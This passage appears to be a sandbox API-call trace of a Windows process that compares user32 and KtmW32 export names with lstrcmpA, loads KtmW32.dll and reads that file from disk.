(lpString1="BroadcastSystemMessageA", lpString2="AllowForegroundActivation") returned 1 [0095.286] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowSetForegroundWindow") returned 1 [0095.286] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnimateWindow") returned 1 [0095.286] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnyPopup") returned 1 [0095.286] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuA") returned 1 [0095.286] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuW") returned 1 [0095.286] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ArrangeIconicWindows") returned 1 [0095.286] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AttachThreadInput") returned 1 [0095.286] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginDeferWindowPos") returned 1 [0095.286] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginPaint") returned 1 [0095.286] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BlockInput") returned 1 [0095.286] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BringWindowToTop") returned 1 [0095.286] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessage") returned 1 [0095.286] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessageA") returned 0 [0095.286] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ActivateKeyboardLayout") returned 1 [0095.286] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AddClipboardFormatListener") returned 1 [0095.286] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRect") returned 1 [0095.286] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRectEx") returned 1 [0095.286] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AlignRects") returned 1 [0095.286] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowForegroundActivation") returned 1 [0095.286] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowSetForegroundWindow") returned 1 [0095.286] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnimateWindow") returned 1 [0095.286] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnyPopup") returned 1 [0095.287] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuA") returned 1 [0095.287] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuW") returned 1 [0095.287] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ArrangeIconicWindows") returned 1 [0095.287] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AttachThreadInput") returned 1 [0095.287] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginDeferWindowPos") returned 1 [0095.287] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginPaint") returned 1 [0095.287] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BlockInput") returned 1 [0095.287] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BringWindowToTop") returned 1 [0095.287] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessage") returned 1 [0095.287] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageA") returned 1 [0095.287] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageExA") returned 0 [0095.287] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ActivateKeyboardLayout") returned 1 [0095.287] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AddClipboardFormatListener") returned 1 [0095.287] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRect") returned 1 [0095.287] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRectEx") returned 1 [0095.287] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AlignRects") returned 1 [0095.287] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowForegroundActivation") returned 1 [0095.287] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowSetForegroundWindow") returned 1 [0095.287] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnimateWindow") returned 1 [0095.287] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnyPopup") returned 1 [0095.287] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuA") returned 1 [0095.287] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuW") returned 1 [0095.287] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ArrangeIconicWindows") returned 1 [0095.287] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AttachThreadInput") returned 1 [0095.287] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginDeferWindowPos") returned 1 [0095.287] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginPaint") returned 1 [0095.287] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BlockInput") returned 1 [0095.287] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BringWindowToTop") returned 1 [0095.287] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessage") returned 1 [0095.287] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageA") returned 1 [0095.287] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExA") returned 1 [0095.288] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExW") returned 0 [0095.288] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ActivateKeyboardLayout") returned 1 [0095.288] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AddClipboardFormatListener") returned 1 [0095.288] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRect") returned 1 [0095.288] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRectEx") returned 1 [0095.288] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AlignRects") returned 1 [0095.288] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowForegroundActivation") returned 1 [0095.288] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowSetForegroundWindow") returned 1 [0095.288] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnimateWindow") returned 1 [0095.288] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnyPopup") returned 1 [0095.288] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuA") returned 1 [0095.288] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuW") returned 1 [0095.288] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ArrangeIconicWindows") returned 1 [0095.288] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AttachThreadInput") returned 1 [0095.288] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginDeferWindowPos") returned 1 [0095.288] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginPaint") returned 1 [0095.288] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BlockInput") returned 1 [0095.288] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BringWindowToTop") returned 1 [0095.288] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BroadcastSystemMessage") returned 1 [0097.550] GetProcessHeap () returned 0x570000 [0097.550] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x417e040 | out: hHeap=0x570000) returned 1 [0097.565] GetProcessHeap () returned 0x570000 [0097.565] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5891e0 [0097.565] LoadLibraryA (lpLibFileName="KtmW32.dll") returned 0x7ffc4bf10000 [0097.811] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0097.811] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0097.811] GetModuleFileNameA (in: hModule=0x7ffc4bf10000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")) returned 0x1e [0097.812] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0097.812] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0097.812] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0097.812] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=24064) returned 1 [0097.812] GetProcessHeap () returned 0x570000 [0097.812] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x5e00) returned 0x2db5030 [0097.812] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0097.812] ReadFile (in: hFile=0x17c, lpBuffer=0x2db5030, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2db5030*, lpNumberOfBytesRead=0x14f5a4*=0x5e00, lpOverlapped=0x0) returned 1 [0097.813] CloseHandle (hObject=0x17c) returned 1 [0097.813] lstrcmpA (lpString1="CommitComplete", lpString2="CommitComplete") returned 0 [0097.813] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitComplete") returned 1 [0097.813] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitEnlistment") returned 0 [0097.813] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitComplete") returned 1 [0097.814] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitEnlistment") returned 1 [0097.814] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitTransaction") returned 0 [0097.814] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitComplete") returned 1 [0097.814] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitEnlistment") returned 1 [0097.814] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransaction") returned 1 [0097.814] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransactionAsync") returned 0 [0097.814] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitComplete") returned 1 [0097.814] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitEnlistment") returned 1 [0097.814] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransaction") returned 1 [0097.814] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransactionAsync") returned 1 [0097.814] lstrcmpA (lpString1="CreateEnlistment", lpString2="CreateEnlistment") returned 0 [0097.814] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitComplete") returned 1 [0097.814] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitEnlistment") returned 1 [0097.814] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransaction") returned 1 [0097.814] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransactionAsync") returned 1 [0097.814] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateEnlistment") returned 1 [0097.814] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateResourceManager") returned 0 [0097.814] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitComplete") returned 1 [0097.814] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitEnlistment") returned 1 [0097.814] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransaction") returned 1 [0097.814] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransactionAsync") returned 1 [0097.814] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateEnlistment") returned 1 [0097.814] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateResourceManager") returned 1 [0097.814] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateTransaction") returned 0 [0097.814] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitComplete") returned 1 [0097.814] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitEnlistment") returned 1 [0097.814] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransaction") returned 1 [0097.815] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0097.815] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateEnlistment") returned 1 [0097.815] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateResourceManager") returned 1 [0097.815] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransaction") returned 1 [0097.815] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransactionManager") returned 0 [0097.815] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitComplete") returned 1 [0097.815] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitEnlistment") returned 1 [0097.815] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransaction") returned 1 [0097.815] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0097.815] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateEnlistment") returned 1 [0097.815] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateResourceManager") returned 1 [0097.815] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransaction") returned 1 [0097.815] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransactionManager") returned 1 [0097.815] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 0 [0097.815] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitComplete") returned 1 [0097.815] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitEnlistment") returned 1 [0097.815] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransaction") returned 1 [0097.815] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransactionAsync") returned 1 [0097.815] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateEnlistment") returned 1 [0097.815] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateResourceManager") returned 1 [0097.815] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransaction") returned 1 [0097.815] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransactionManager") returned 1 [0097.815] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetCurrentClockTransactionManager") returned 1 [0097.815] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetEnlistmentId") returned 0 [0097.816] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitComplete") returned 1 [0097.816] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitEnlistment") returned 1 [0097.816] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransaction") returned 1 [0097.816] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransactionAsync") returned 1 [0097.816] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateEnlistment") returned 1 [0097.816] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateResourceManager") returned 1 [0097.816] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransaction") returned 1 [0097.816] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransactionManager") returned 1 [0097.816] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0097.816] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentId") returned 1 [0097.816] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentRecoveryInformation") returned 0 [0097.816] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitComplete") returned 1 [0097.816] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitEnlistment") returned 1 [0097.816] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransaction") returned 1 [0097.817] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransactionAsync") returned 1 [0097.817] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateEnlistment") returned 1 [0097.817] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateResourceManager") returned 1 [0097.817] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransaction") returned 1 [0097.817] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransactionManager") returned 1 [0097.817] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0097.817] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentId") returned 1 [0097.817] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0097.817] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetNotificationResourceManager") returned 0 [0097.817] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitComplete") returned 1 [0097.817] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitEnlistment") returned 1 [0097.817] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransaction") returned 1 [0097.817] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransactionAsync") returned 1 [0097.817] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateEnlistment") returned 1 [0097.817] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateResourceManager") returned 1 [0097.817] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransaction") returned 1 [0097.817] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransactionManager") returned 1 [0097.818] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetCurrentClockTransactionManager") returned 1 [0097.818] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentId") returned 1 [0097.818] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0097.818] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManager") returned 1 [0097.818] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManagerAsync") returned 0 [0097.818] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitComplete") returned 1 [0097.818] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitEnlistment") returned 1 [0097.818] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransaction") returned 1 [0097.818] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransactionAsync") returned 1 [0097.818] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateEnlistment") returned 1 [0097.818] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateResourceManager") returned 1 [0097.818] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransaction") returned 1 [0097.818] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransactionManager") returned 1 [0097.818] lstrcmpA (lpString1="GetTransactionId", lpString2="GetCurrentClockTransactionManager") returned 1 [0097.818] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentId") returned 1 [0097.818] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0097.818] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManager") returned 1 [0097.818] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0097.818] lstrcmpA (lpString1="GetTransactionId", lpString2="GetTransactionId") returned 0 [0097.818] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitComplete") returned 1 [0097.818] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitEnlistment") returned 1 [0097.818] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransaction") returned 1 [0097.818] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransactionAsync") returned 1 [0097.818] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateEnlistment") returned 1 [0097.818] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateResourceManager") returned 1 [0097.818] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransaction") returned 1 [0097.818] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransactionManager") returned 1 [0097.818] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0097.819] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentId") returned 1 [0097.819] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0097.819] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManager") returned 1 [0097.819] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManagerAsync") returned 1 [0097.819] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionId") returned 1 [0097.819] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionInformation") returned 0 [0097.819] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitComplete") returned 1 [0097.819] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitEnlistment") returned 1 [0097.819] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransaction") returned 1 [0097.819] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransactionAsync") returned 1 [0097.819] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateEnlistment") returned 1 [0097.819] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateResourceManager") returned 1 [0097.819] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransaction") returned 1 [0097.819] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransactionManager") returned 1 [0097.819] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetCurrentClockTransactionManager") returned 1 [0097.819] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentId") returned 1 [0097.819] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0097.819] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManager") returned 1 [0097.819] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0097.819] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionId") returned 1 [0097.820] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionInformation") returned 1 [0097.820] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionManagerId") returned 0 [0097.820] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitComplete") returned 1 [0097.820] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitEnlistment") returned 1 [0097.820] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransaction") returned 1 [0097.820] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransactionAsync") returned 1 [0097.820] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateEnlistment") returned 1 [0097.820] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateResourceManager") returned 1 [0097.820] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransaction") returned 1 [0097.820] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransactionManager") returned 1 [0097.820] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetCurrentClockTransactionManager") returned 1 [0097.820] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentId") returned 1 [0097.820] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0097.820] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManager") returned 1 [0097.820] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManagerAsync") returned 1 [0097.820] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionId") returned 1 [0097.820] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionInformation") returned 1 [0097.820] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionManagerId") returned 1 [0097.820] lstrcmpA (lpString1="OpenEnlistment", lpString2="OpenEnlistment") returned 0 [0097.820] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitComplete") returned 1 [0097.820] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitEnlistment") returned 1 [0097.820] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransaction") returned 1 [0097.820] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransactionAsync") returned 1 [0097.820] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateEnlistment") returned 1 [0097.820] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateResourceManager") returned 1 [0097.821] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransaction") returned 1 [0097.821] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransactionManager") returned 1 [0097.821] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0097.821] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentId") returned 1 [0097.821] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0097.821] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManager") returned 1 [0097.821] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0097.821] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionId") returned 1 [0097.821] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionInformation") returned 1 [0097.821] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionManagerId") returned 1 [0097.821] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenEnlistment") returned 1 [0097.821] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenResourceManager") returned 0 [0097.821] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitComplete") returned 1 [0097.821] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitEnlistment") returned 1 [0097.821] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransaction") returned 1 [0097.821] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransactionAsync") returned 1 [0097.821] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateEnlistment") returned 1 [0097.821] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateResourceManager") returned 1 [0097.821] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransaction") returned 1 [0097.821] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransactionManager") returned 1 [0097.821] lstrcmpA (lpString1="OpenTransaction", lpString2="GetCurrentClockTransactionManager") returned 1 [0097.821] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentId") returned 1 [0097.821] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0097.821] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManager") returned 1 [0097.821] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManagerAsync") returned 1 [0097.821] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionId") returned 1 [0097.821] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionInformation") returned 1 [0097.821] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionManagerId") returned 1 [0097.822] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenEnlistment") returned 1 [0097.822] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenResourceManager") returned 1 [0097.822] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenTransaction") returned 0 [0097.822] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitComplete") returned 1 [0097.822] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitEnlistment") returned 1 [0097.822] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransaction") returned 1 [0097.822] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0097.822] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateEnlistment") returned 1 [0097.822] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateResourceManager") returned 1 [0097.822] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransaction") returned 1 [0097.822] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransactionManager") returned 1 [0097.822] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0097.822] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentId") returned 1 [0097.822] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0097.822] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManager") returned 1 [0097.822] 